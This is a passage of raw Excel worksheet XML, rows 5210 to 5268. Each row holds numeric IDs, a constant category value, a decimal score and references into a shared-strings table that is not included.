      <c r="G5210" t="s">
        <v>10299</v>
      </c>
      <c r="H5210" t="s">
        <v>10300</v>
      </c>
    </row>
    <row r="5211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5211" s="1">
        <v>5209</v>
      </c>
      <c r="B5211">
        <v>7098</v>
      </c>
      <c r="C5211">
        <v>7098</v>
      </c>
      <c r="D5211">
        <v>3</v>
      </c>
      <c r="E5211">
        <v>0.82719999551773071</v>
      </c>
      <c r="F5211" t="s">
        <v>10120</v>
      </c>
      <c r="G5211" t="s">
        <v>10301</v>
      </c>
      <c r="H5211" t="s">
        <v>10302</v>
      </c>
    </row>
    <row r="5212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5212" s="1">
        <v>5210</v>
      </c>
      <c r="B5212">
        <v>5964</v>
      </c>
      <c r="C5212">
        <v>5964</v>
      </c>
      <c r="D5212">
        <v>3</v>
      </c>
      <c r="E5212">
        <v>0.78469997644424438</v>
      </c>
      <c r="F5212" t="s">
        <v>10120</v>
      </c>
      <c r="G5212" t="s">
        <v>10303</v>
      </c>
      <c r="H5212" t="s">
        <v>10304</v>
      </c>
    </row>
    <row r="5213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5213" s="1">
        <v>5211</v>
      </c>
      <c r="B5213">
        <v>6415</v>
      </c>
      <c r="C5213">
        <v>6415</v>
      </c>
      <c r="D5213">
        <v>3</v>
      </c>
      <c r="E5213">
        <v>0.8278999924659729</v>
      </c>
      <c r="F5213" t="s">
        <v>10120</v>
      </c>
      <c r="G5213" t="s">
        <v>10305</v>
      </c>
      <c r="H5213" t="s">
        <v>10306</v>
      </c>
    </row>
    <row r="5214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5214" s="1">
        <v>5212</v>
      </c>
      <c r="B5214">
        <v>7859</v>
      </c>
      <c r="C5214">
        <v>7859</v>
      </c>
      <c r="D5214">
        <v>3</v>
      </c>
      <c r="E5214">
        <v>0.5494999885559082</v>
      </c>
      <c r="F5214" t="s">
        <v>10120</v>
      </c>
      <c r="G5214" t="s">
        <v>10307</v>
      </c>
      <c r="H5214" t="s">
        <v>10308</v>
      </c>
    </row>
    <row r="5215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5215" s="1">
        <v>5213</v>
      </c>
      <c r="B5215">
        <v>5982</v>
      </c>
      <c r="C5215">
        <v>5982</v>
      </c>
      <c r="D5215">
        <v>3</v>
      </c>
      <c r="E5215">
        <v>0.51120001077651978</v>
      </c>
      <c r="F5215" t="s">
        <v>10120</v>
      </c>
      <c r="G5215" t="s">
        <v>10309</v>
      </c>
      <c r="H5215" t="s">
        <v>10310</v>
      </c>
    </row>
    <row r="5216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5216" s="1">
        <v>5214</v>
      </c>
      <c r="B5216">
        <v>6978</v>
      </c>
      <c r="C5216">
        <v>6978</v>
      </c>
      <c r="D5216">
        <v>3</v>
      </c>
      <c r="E5216">
        <v>0.79500001668930054</v>
      </c>
      <c r="F5216" t="s">
        <v>10120</v>
      </c>
      <c r="G5216" t="s">
        <v>10311</v>
      </c>
      <c r="H5216" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="5217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5217" s="1">
        <v>5215</v>
      </c>
      <c r="B5217">
        <v>7766</v>
      </c>
      <c r="C5217">
        <v>7766</v>
      </c>
      <c r="D5217">
        <v>3</v>
      </c>
      <c r="E5217">
        <v>0.71369999647140503</v>
      </c>
      <c r="F5217" t="s">
        <v>10120</v>
      </c>
      <c r="G5217" t="s">
        <v>10313</v>
      </c>
      <c r="H5217" t="s">
        <v>10314</v>
      </c>
    </row>
    <row r="5218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5218" s="1">
        <v>5216</v>
      </c>
      <c r="B5218">
        <v>7860</v>
      </c>
      <c r="C5218">
        <v>7860</v>
      </c>
      <c r="D5218">
        <v>3</v>
      </c>
      <c r="E5218">
        <v>0.78600001335144043</v>
      </c>
      <c r="F5218" t="s">
        <v>10120</v>
      </c>
      <c r="G5218" t="s">
        <v>10315</v>
      </c>
      <c r="H5218" t="s">
        <v>10316</v>
      </c>
    </row>
    <row r="5219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5219" s="1">
        <v>5217</v>
      </c>
      <c r="B5219">
        <v>7861</v>
      </c>
      <c r="C5219">
        <v>7861</v>
      </c>
      <c r="D5219">
        <v>3</v>
      </c>
      <c r="E5219">
        <v>0.68010002374649048</v>
      </c>
      <c r="F5219" t="s">
        <v>10120</v>
      </c>
      <c r="G5219" t="s">
        <v>10317</v>
      </c>
      <c r="H5219" t="s">
        <v>10318</v>
      </c>
    </row>
    <row r="5220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5220" s="1">
        <v>5218</v>
      </c>
      <c r="B5220">
        <v>6468</v>
      </c>
      <c r="C5220">
        <v>6468</v>
      </c>
      <c r="D5220">
        <v>3</v>
      </c>
      <c r="E5220">
        <v>0.59359997510910034</v>
      </c>
      <c r="F5220" t="s">
        <v>10120</v>
      </c>
      <c r="G5220" t="s">
        <v>10319</v>
      </c>
      <c r="H5220" t="s">
        <v>10320</v>
      </c>
    </row>
    <row r="5221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5221" s="1">
        <v>5219</v>
      </c>
      <c r="B5221">
        <v>7852</v>
      </c>
      <c r="C5221">
        <v>7852</v>
      </c>
      <c r="D5221">
        <v>3</v>
      </c>
      <c r="E5221">
        <v>0.74730002880096436</v>
      </c>
      <c r="F5221" t="s">
        <v>10120</v>
      </c>
      <c r="G5221" t="s">
        <v>10321</v>
      </c>
      <c r="H5221" t="s">
        <v>10322</v>
      </c>
    </row>
    <row r="5222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5222" s="1">
        <v>5220</v>
      </c>
      <c r="B5222">
        <v>6469</v>
      </c>
      <c r="C5222">
        <v>6469</v>
      </c>
      <c r="D5222">
        <v>3</v>
      </c>
      <c r="E5222">
        <v>0.69429999589920044</v>
      </c>
      <c r="F5222" t="s">
        <v>10120</v>
      </c>
      <c r="G5222" t="s">
        <v>10323</v>
      </c>
      <c r="H5222" t="s">
        <v>10324</v>
      </c>
    </row>
    <row r="5223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5223" s="1">
        <v>5221</v>
      </c>
      <c r="B5223">
        <v>7090</v>
      </c>
      <c r="C5223">
        <v>7090</v>
      </c>
      <c r="D5223">
        <v>3</v>
      </c>
      <c r="E5223">
        <v>0.65069997310638428</v>
      </c>
      <c r="F5223" t="s">
        <v>10120</v>
      </c>
      <c r="G5223" t="s">
        <v>10325</v>
      </c>
      <c r="H5223" t="s">
        <v>10326</v>
      </c>
    </row>
    <row r="5224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5224" s="1">
        <v>5222</v>
      </c>
      <c r="B5224">
        <v>7819</v>
      </c>
      <c r="C5224">
        <v>7819</v>
      </c>
      <c r="D5224">
        <v>3</v>
      </c>
      <c r="E5224">
        <v>0.81919997930526733</v>
      </c>
      <c r="F5224" t="s">
        <v>10120</v>
      </c>
      <c r="G5224" t="s">
        <v>10327</v>
      </c>
      <c r="H5224" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="5225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5225" s="1">
        <v>5223</v>
      </c>
      <c r="B5225">
        <v>6936</v>
      </c>
      <c r="C5225">
        <v>6936</v>
      </c>
      <c r="D5225">
        <v>3</v>
      </c>
      <c r="E5225">
        <v>0.73439997434616089</v>
      </c>
      <c r="F5225" t="s">
        <v>10120</v>
      </c>
      <c r="G5225" t="s">
        <v>10329</v>
      </c>
      <c r="H5225" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="5226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5226" s="1">
        <v>5224</v>
      </c>
      <c r="B5226">
        <v>6475</v>
      </c>
      <c r="C5226">
        <v>6475</v>
      </c>
      <c r="D5226">
        <v>3</v>
      </c>
      <c r="E5226">
        <v>0.63690000772476196</v>
      </c>
      <c r="F5226" t="s">
        <v>10120</v>
      </c>
      <c r="G5226" t="s">
        <v>10331</v>
      </c>
      <c r="H5226" t="s">
        <v>10332</v>
      </c>
    </row>
    <row r="5227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5227" s="1">
        <v>5225</v>
      </c>
      <c r="B5227">
        <v>6980</v>
      </c>
      <c r="C5227">
        <v>6980</v>
      </c>
      <c r="D5227">
        <v>3</v>
      </c>
      <c r="E5227">
        <v>0.62150001525878906</v>
      </c>
      <c r="F5227" t="s">
        <v>10120</v>
      </c>
      <c r="G5227" t="s">
        <v>10333</v>
      </c>
      <c r="H5227" t="s">
        <v>10334</v>
      </c>
    </row>
    <row r="5228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5228" s="1">
        <v>5226</v>
      </c>
      <c r="B5228">
        <v>7851</v>
      </c>
      <c r="C5228">
        <v>7851</v>
      </c>
      <c r="D5228">
        <v>3</v>
      </c>
      <c r="E5228">
        <v>0.97560000419616699</v>
      </c>
      <c r="F5228" t="s">
        <v>10120</v>
      </c>
      <c r="G5228" t="s">
        <v>10335</v>
      </c>
      <c r="H5228" t="s">
        <v>10336</v>
      </c>
    </row>
    <row r="5229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5229" s="1">
        <v>5227</v>
      </c>
      <c r="B5229">
        <v>7756</v>
      </c>
      <c r="C5229">
        <v>7756</v>
      </c>
      <c r="D5229">
        <v>3</v>
      </c>
      <c r="E5229">
        <v>0.99500000476837158</v>
      </c>
      <c r="F5229" t="s">
        <v>10120</v>
      </c>
      <c r="G5229" t="s">
        <v>10337</v>
      </c>
      <c r="H5229" t="s">
        <v>10338</v>
      </c>
    </row>
    <row r="5230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5230" s="1">
        <v>5228</v>
      </c>
      <c r="B5230">
        <v>7755</v>
      </c>
      <c r="C5230">
        <v>7755</v>
      </c>
      <c r="D5230">
        <v>3</v>
      </c>
      <c r="E5230">
        <v>0.95709997415542603</v>
      </c>
      <c r="F5230" t="s">
        <v>10120</v>
      </c>
      <c r="G5230" t="s">
        <v>10339</v>
      </c>
      <c r="H5230" t="s">
        <v>10340</v>
      </c>
    </row>
    <row r="5231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5231" s="1">
        <v>5229</v>
      </c>
      <c r="B5231">
        <v>7821</v>
      </c>
      <c r="C5231">
        <v>7821</v>
      </c>
      <c r="D5231">
        <v>3</v>
      </c>
      <c r="E5231">
        <v>0.78780001401901245</v>
      </c>
      <c r="F5231" t="s">
        <v>10120</v>
      </c>
      <c r="G5231" t="s">
        <v>10341</v>
      </c>
      <c r="H5231" t="s">
        <v>10342</v>
      </c>
    </row>
    <row r="5232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5232" s="1">
        <v>5230</v>
      </c>
      <c r="B5232">
        <v>7067</v>
      </c>
      <c r="C5232">
        <v>7067</v>
      </c>
      <c r="D5232">
        <v>3</v>
      </c>
      <c r="E5232">
        <v>0.63349997997283936</v>
      </c>
      <c r="F5232" t="s">
        <v>10120</v>
      </c>
      <c r="G5232" t="s">
        <v>10343</v>
      </c>
      <c r="H5232" t="s">
        <v>10344</v>
      </c>
    </row>
    <row r="5233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5233" s="1">
        <v>5231</v>
      </c>
      <c r="B5233">
        <v>7865</v>
      </c>
      <c r="C5233">
        <v>7865</v>
      </c>
      <c r="D5233">
        <v>3</v>
      </c>
      <c r="E5233">
        <v>0.75029999017715454</v>
      </c>
      <c r="F5233" t="s">
        <v>10120</v>
      </c>
      <c r="G5233" t="s">
        <v>10345</v>
      </c>
      <c r="H5233" t="s">
        <v>10346</v>
      </c>
    </row>
    <row r="5234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5234" s="1">
        <v>5232</v>
      </c>
      <c r="B5234">
        <v>7855</v>
      </c>
      <c r="C5234">
        <v>7855</v>
      </c>
      <c r="D5234">
        <v>3</v>
      </c>
      <c r="E5234">
        <v>0.99390000104904175</v>
      </c>
      <c r="F5234" t="s">
        <v>10120</v>
      </c>
      <c r="G5234" t="s">
        <v>10347</v>
      </c>
      <c r="H5234" t="s">
        <v>10348</v>
      </c>
    </row>
    <row r="5235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5235" s="1">
        <v>5233</v>
      </c>
      <c r="B5235">
        <v>7818</v>
      </c>
      <c r="C5235">
        <v>7818</v>
      </c>
      <c r="D5235">
        <v>3</v>
      </c>
      <c r="E5235">
        <v>0.66219997406005859</v>
      </c>
      <c r="F5235" t="s">
        <v>10120</v>
      </c>
      <c r="G5235" t="s">
        <v>10349</v>
      </c>
      <c r="H5235" t="s">
        <v>10350</v>
      </c>
    </row>
    <row r="5236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5236" s="1">
        <v>5234</v>
      </c>
      <c r="B5236">
        <v>7800</v>
      </c>
      <c r="C5236">
        <v>7800</v>
      </c>
      <c r="D5236">
        <v>3</v>
      </c>
      <c r="E5236">
        <v>0.99080002307891846</v>
      </c>
      <c r="F5236" t="s">
        <v>10120</v>
      </c>
      <c r="G5236" t="s">
        <v>10351</v>
      </c>
      <c r="H5236" t="s">
        <v>10352</v>
      </c>
    </row>
    <row r="5237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5237" s="1">
        <v>5235</v>
      </c>
      <c r="B5237">
        <v>6977</v>
      </c>
      <c r="C5237">
        <v>6977</v>
      </c>
      <c r="D5237">
        <v>3</v>
      </c>
      <c r="E5237">
        <v>0.78810000419616699</v>
      </c>
      <c r="F5237" t="s">
        <v>10120</v>
      </c>
      <c r="G5237" t="s">
        <v>10353</v>
      </c>
      <c r="H5237" t="s">
        <v>10354</v>
      </c>
    </row>
    <row r="5238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5238" s="1">
        <v>5236</v>
      </c>
      <c r="B5238">
        <v>6039</v>
      </c>
      <c r="C5238">
        <v>6039</v>
      </c>
      <c r="D5238">
        <v>3</v>
      </c>
      <c r="E5238">
        <v>0.4260999858379364</v>
      </c>
      <c r="F5238" t="s">
        <v>10120</v>
      </c>
      <c r="G5238" t="s">
        <v>10355</v>
      </c>
      <c r="H5238" t="s">
        <v>10356</v>
      </c>
    </row>
    <row r="5239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5239" s="1">
        <v>5237</v>
      </c>
      <c r="B5239">
        <v>7081</v>
      </c>
      <c r="C5239">
        <v>7081</v>
      </c>
      <c r="D5239">
        <v>3</v>
      </c>
      <c r="E5239">
        <v>0.58380001783370972</v>
      </c>
      <c r="F5239" t="s">
        <v>10120</v>
      </c>
      <c r="G5239" t="s">
        <v>10357</v>
      </c>
      <c r="H5239" t="s">
        <v>10358</v>
      </c>
    </row>
    <row r="5240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5240" s="1">
        <v>5238</v>
      </c>
      <c r="B5240">
        <v>7083</v>
      </c>
      <c r="C5240">
        <v>7083</v>
      </c>
      <c r="D5240">
        <v>3</v>
      </c>
      <c r="E5240">
        <v>0.99099999666213989</v>
      </c>
      <c r="F5240" t="s">
        <v>10120</v>
      </c>
      <c r="G5240" t="s">
        <v>10359</v>
      </c>
      <c r="H5240" t="s">
        <v>10360</v>
      </c>
    </row>
    <row r="5241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5241" s="1">
        <v>5239</v>
      </c>
      <c r="B5241">
        <v>6417</v>
      </c>
      <c r="C5241">
        <v>6417</v>
      </c>
      <c r="D5241">
        <v>3</v>
      </c>
      <c r="E5241">
        <v>0.68599998950958252</v>
      </c>
      <c r="F5241" t="s">
        <v>10120</v>
      </c>
      <c r="G5241" t="s">
        <v>10361</v>
      </c>
      <c r="H5241" t="s">
        <v>10362</v>
      </c>
    </row>
    <row r="5242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5242" s="1">
        <v>5240</v>
      </c>
      <c r="B5242">
        <v>6040</v>
      </c>
      <c r="C5242">
        <v>6040</v>
      </c>
      <c r="D5242">
        <v>3</v>
      </c>
      <c r="E5242">
        <v>0.60369998216629028</v>
      </c>
      <c r="F5242" t="s">
        <v>10120</v>
      </c>
      <c r="G5242" t="s">
        <v>10363</v>
      </c>
      <c r="H5242" t="s">
        <v>10364</v>
      </c>
    </row>
    <row r="5243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5243" s="1">
        <v>5241</v>
      </c>
      <c r="B5243">
        <v>6947</v>
      </c>
      <c r="C5243">
        <v>6947</v>
      </c>
      <c r="D5243">
        <v>3</v>
      </c>
      <c r="E5243">
        <v>0.6492999792098999</v>
      </c>
      <c r="F5243" t="s">
        <v>10120</v>
      </c>
      <c r="G5243" t="s">
        <v>10365</v>
      </c>
      <c r="H5243" t="s">
        <v>10366</v>
      </c>
    </row>
    <row r="5244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5244" s="1">
        <v>5242</v>
      </c>
      <c r="B5244">
        <v>6416</v>
      </c>
      <c r="C5244">
        <v>6416</v>
      </c>
      <c r="D5244">
        <v>3</v>
      </c>
      <c r="E5244">
        <v>0.58869999647140503</v>
      </c>
      <c r="F5244" t="s">
        <v>10120</v>
      </c>
      <c r="G5244" t="s">
        <v>10367</v>
      </c>
      <c r="H5244" t="s">
        <v>10368</v>
      </c>
    </row>
    <row r="5245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5245" s="1">
        <v>5243</v>
      </c>
      <c r="B5245">
        <v>5965</v>
      </c>
      <c r="C5245">
        <v>5965</v>
      </c>
      <c r="D5245">
        <v>3</v>
      </c>
      <c r="E5245">
        <v>0.91219997406005859</v>
      </c>
      <c r="F5245" t="s">
        <v>10120</v>
      </c>
      <c r="G5245" t="s">
        <v>10369</v>
      </c>
      <c r="H5245" t="s">
        <v>10370</v>
      </c>
    </row>
    <row r="5246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5246" s="1">
        <v>5244</v>
      </c>
      <c r="B5246">
        <v>7809</v>
      </c>
      <c r="C5246">
        <v>7809</v>
      </c>
      <c r="D5246">
        <v>3</v>
      </c>
      <c r="E5246">
        <v>0.55500000715255737</v>
      </c>
      <c r="F5246" t="s">
        <v>10120</v>
      </c>
      <c r="G5246" t="s">
        <v>10371</v>
      </c>
      <c r="H5246" t="s">
        <v>10372</v>
      </c>
    </row>
    <row r="5247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5247" s="1">
        <v>5245</v>
      </c>
      <c r="B5247">
        <v>7857</v>
      </c>
      <c r="C5247">
        <v>7857</v>
      </c>
      <c r="D5247">
        <v>3</v>
      </c>
      <c r="E5247">
        <v>0.52160000801086426</v>
      </c>
      <c r="F5247" t="s">
        <v>10120</v>
      </c>
      <c r="G5247" t="s">
        <v>10373</v>
      </c>
      <c r="H5247" t="s">
        <v>10374</v>
      </c>
    </row>
    <row r="5248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5248" s="1">
        <v>5246</v>
      </c>
      <c r="B5248">
        <v>7813</v>
      </c>
      <c r="C5248">
        <v>7813</v>
      </c>
      <c r="D5248">
        <v>3</v>
      </c>
      <c r="E5248">
        <v>0.83969998359680176</v>
      </c>
      <c r="F5248" t="s">
        <v>10120</v>
      </c>
      <c r="G5248" t="s">
        <v>10375</v>
      </c>
      <c r="H5248" t="s">
        <v>10376</v>
      </c>
    </row>
    <row r="5249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5249" s="1">
        <v>5247</v>
      </c>
      <c r="B5249">
        <v>5966</v>
      </c>
      <c r="C5249">
        <v>5966</v>
      </c>
      <c r="D5249">
        <v>3</v>
      </c>
      <c r="E5249">
        <v>0.87379997968673706</v>
      </c>
      <c r="F5249" t="s">
        <v>10120</v>
      </c>
      <c r="G5249" t="s">
        <v>10377</v>
      </c>
      <c r="H5249" t="s">
        <v>10378</v>
      </c>
    </row>
    <row r="5250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5250" s="1">
        <v>5248</v>
      </c>
      <c r="B5250">
        <v>6041</v>
      </c>
      <c r="C5250">
        <v>6041</v>
      </c>
      <c r="D5250">
        <v>3</v>
      </c>
      <c r="E5250">
        <v>0.81330001354217529</v>
      </c>
      <c r="F5250" t="s">
        <v>10120</v>
      </c>
      <c r="G5250" t="s">
        <v>10379</v>
      </c>
      <c r="H5250" t="s">
        <v>10380</v>
      </c>
    </row>
    <row r="5251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5251" s="1">
        <v>5249</v>
      </c>
      <c r="B5251">
        <v>7787</v>
      </c>
      <c r="C5251">
        <v>7787</v>
      </c>
      <c r="D5251">
        <v>3</v>
      </c>
      <c r="E5251">
        <v>0.75459998846054077</v>
      </c>
      <c r="F5251" t="s">
        <v>10120</v>
      </c>
      <c r="G5251" t="s">
        <v>10381</v>
      </c>
      <c r="H5251" t="s">
        <v>10382</v>
      </c>
    </row>
    <row r="5252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5252" s="1">
        <v>5250</v>
      </c>
      <c r="B5252">
        <v>7784</v>
      </c>
      <c r="C5252">
        <v>7784</v>
      </c>
      <c r="D5252">
        <v>3</v>
      </c>
      <c r="E5252">
        <v>0.87410002946853638</v>
      </c>
      <c r="F5252" t="s">
        <v>10120</v>
      </c>
      <c r="G5252" t="s">
        <v>10383</v>
      </c>
      <c r="H5252" t="s">
        <v>10384</v>
      </c>
    </row>
    <row r="5253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5253" s="1">
        <v>5251</v>
      </c>
      <c r="B5253">
        <v>6035</v>
      </c>
      <c r="C5253">
        <v>6035</v>
      </c>
      <c r="D5253">
        <v>3</v>
      </c>
      <c r="E5253">
        <v>0.98930001258850098</v>
      </c>
      <c r="F5253" t="s">
        <v>10120</v>
      </c>
      <c r="G5253" t="s">
        <v>10385</v>
      </c>
      <c r="H5253" t="s">
        <v>10386</v>
      </c>
    </row>
    <row r="5254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5254" s="1">
        <v>5252</v>
      </c>
      <c r="B5254">
        <v>7087</v>
      </c>
      <c r="C5254">
        <v>7087</v>
      </c>
      <c r="D5254">
        <v>3</v>
      </c>
      <c r="E5254">
        <v>0.94559997320175171</v>
      </c>
      <c r="F5254" t="s">
        <v>10120</v>
      </c>
      <c r="G5254" t="s">
        <v>10387</v>
      </c>
      <c r="H5254" t="s">
        <v>10388</v>
      </c>
    </row>
    <row r="5255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5255" s="1">
        <v>5253</v>
      </c>
      <c r="B5255">
        <v>6458</v>
      </c>
      <c r="C5255">
        <v>6458</v>
      </c>
      <c r="D5255">
        <v>3</v>
      </c>
      <c r="E5255">
        <v>0.89300000667572021</v>
      </c>
      <c r="F5255" t="s">
        <v>10120</v>
      </c>
      <c r="G5255" t="s">
        <v>10389</v>
      </c>
      <c r="H5255" t="s">
        <v>10390</v>
      </c>
    </row>
    <row r="5256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5256" s="1">
        <v>5254</v>
      </c>
      <c r="B5256">
        <v>6036</v>
      </c>
      <c r="C5256">
        <v>6036</v>
      </c>
      <c r="D5256">
        <v>3</v>
      </c>
      <c r="E5256">
        <v>0.47999998927116388</v>
      </c>
      <c r="F5256" t="s">
        <v>10120</v>
      </c>
      <c r="G5256" t="s">
        <v>10391</v>
      </c>
      <c r="H5256" t="s">
        <v>10392</v>
      </c>
    </row>
    <row r="5257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5257" s="1">
        <v>5255</v>
      </c>
      <c r="B5257">
        <v>6481</v>
      </c>
      <c r="C5257">
        <v>6481</v>
      </c>
      <c r="D5257">
        <v>3</v>
      </c>
      <c r="E5257">
        <v>0.61409997940063477</v>
      </c>
      <c r="F5257" t="s">
        <v>10120</v>
      </c>
      <c r="G5257" t="s">
        <v>10393</v>
      </c>
      <c r="H5257" t="s">
        <v>10394</v>
      </c>
    </row>
    <row r="5258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5258" s="1">
        <v>5256</v>
      </c>
      <c r="B5258">
        <v>7033</v>
      </c>
      <c r="C5258">
        <v>7033</v>
      </c>
      <c r="D5258">
        <v>3</v>
      </c>
      <c r="E5258">
        <v>0.98729997873306274</v>
      </c>
      <c r="F5258" t="s">
        <v>10120</v>
      </c>
      <c r="G5258" t="s">
        <v>10395</v>
      </c>
      <c r="H5258" t="s">
        <v>10396</v>
      </c>
    </row>
    <row r="5259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5259" s="1">
        <v>5257</v>
      </c>
      <c r="B5259">
        <v>7752</v>
      </c>
      <c r="C5259">
        <v>7752</v>
      </c>
      <c r="D5259">
        <v>3</v>
      </c>
      <c r="E5259">
        <v>0.69980001449584961</v>
      </c>
      <c r="F5259" t="s">
        <v>10120</v>
      </c>
      <c r="G5259" t="s">
        <v>10397</v>
      </c>
      <c r="H5259" t="s">
        <v>10398</v>
      </c>
    </row>
    <row r="5260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5260" s="1">
        <v>5258</v>
      </c>
      <c r="B5260">
        <v>6403</v>
      </c>
      <c r="C5260">
        <v>6403</v>
      </c>
      <c r="D5260">
        <v>3</v>
      </c>
      <c r="E5260">
        <v>0.63069999217987061</v>
      </c>
      <c r="F5260" t="s">
        <v>10120</v>
      </c>
      <c r="G5260" t="s">
        <v>10399</v>
      </c>
      <c r="H5260" t="s">
        <v>10400</v>
      </c>
    </row>
    <row r="5261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5261" s="1">
        <v>5259</v>
      </c>
      <c r="B5261">
        <v>7013</v>
      </c>
      <c r="C5261">
        <v>7013</v>
      </c>
      <c r="D5261">
        <v>3</v>
      </c>
      <c r="E5261">
        <v>0.56660002470016479</v>
      </c>
      <c r="F5261" t="s">
        <v>10120</v>
      </c>
      <c r="G5261" t="s">
        <v>10401</v>
      </c>
      <c r="H5261" t="s">
        <v>10402</v>
      </c>
    </row>
    <row r="5262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5262" s="1">
        <v>5260</v>
      </c>
      <c r="B5262">
        <v>7058</v>
      </c>
      <c r="C5262">
        <v>7058</v>
      </c>
      <c r="D5262">
        <v>3</v>
      </c>
      <c r="E5262">
        <v>0.93029999732971191</v>
      </c>
      <c r="F5262" t="s">
        <v>10120</v>
      </c>
      <c r="G5262" t="s">
        <v>10403</v>
      </c>
      <c r="H5262" t="s">
        <v>10404</v>
      </c>
    </row>
    <row r="5263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5263" s="1">
        <v>5261</v>
      </c>
      <c r="B5263">
        <v>6399</v>
      </c>
      <c r="C5263">
        <v>6399</v>
      </c>
      <c r="D5263">
        <v>3</v>
      </c>
      <c r="E5263">
        <v>0.60409998893737793</v>
      </c>
      <c r="F5263" t="s">
        <v>10120</v>
      </c>
      <c r="G5263" t="s">
        <v>10405</v>
      </c>
      <c r="H5263" t="s">
        <v>10406</v>
      </c>
    </row>
    <row r="5264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5264" s="1">
        <v>5262</v>
      </c>
      <c r="B5264">
        <v>7850</v>
      </c>
      <c r="C5264">
        <v>7850</v>
      </c>
      <c r="D5264">
        <v>3</v>
      </c>
      <c r="E5264">
        <v>0.82510000467300415</v>
      </c>
      <c r="F5264" t="s">
        <v>10120</v>
      </c>
      <c r="G5264" t="s">
        <v>10407</v>
      </c>
      <c r="H5264" t="s">
        <v>10408</v>
      </c>
    </row>
    <row r="5265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5265" s="1">
        <v>5263</v>
      </c>
      <c r="B5265">
        <v>7829</v>
      </c>
      <c r="C5265">
        <v>7829</v>
      </c>
      <c r="D5265">
        <v>3</v>
      </c>
      <c r="E5265">
        <v>0.61100000143051147</v>
      </c>
      <c r="F5265" t="s">
        <v>10120</v>
      </c>
      <c r="G5265" t="s">
        <v>10409</v>
      </c>
      <c r="H5265" t="s">
        <v>10410</v>
      </c>
    </row>
    <row r="5266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5266" s="1">
        <v>5264</v>
      </c>
      <c r="B5266">
        <v>6398</v>
      </c>
      <c r="C5266">
        <v>6398</v>
      </c>
      <c r="D5266">
        <v>3</v>
      </c>
      <c r="E5266">
        <v>0.50669997930526733</v>
      </c>
      <c r="F5266" t="s">
        <v>10120</v>
      </c>
      <c r="G5266" t="s">
        <v>10411</v>
      </c>
      <c r="H5266" t="s">
        <v>10412</v>
      </c>
    </row>
    <row r="5267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5267" s="1">
        <v>5265</v>
      </c>
      <c r="B5267">
        <v>6347</v>
      </c>
      <c r="C5267">
        <v>6347</v>
      </c>
      <c r="D5267">
        <v>3</v>
      </c>
      <c r="E5267">
        <v>0.62400001287460327</v>
      </c>
      <c r="F5267" t="s">
        <v>10120</v>
      </c>
      <c r="G5267" t="s">
        <v>10413</v>
      </c>
      <c r="H5267" t="s">
        <v>10414</v>
      </c>
    </row>
    <row r="5268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5268" s="1">
        <v>5266</v>
      </c>
      <c r="B5268">
        <v>7012</v>
      </c>
      <c r="C5268">
        <v>7012</v>
      </c>
      <c r="D5268">
        <v>3</v>
      </c>
      <c r="E5268">
        <v>0.99930000305175781</v>
      </c>
      <c r="F5268" t="s">
        <v>10120</v>
      </c>
      <c r="G5268" t="s">
        <v>10415</v>
      </c>
      <c r="H5268" t="s">
        <v>10416</v>
      </c>
    </row>
    <row r="5269" spans="1:8" x14ac:dyDescent="0.45">
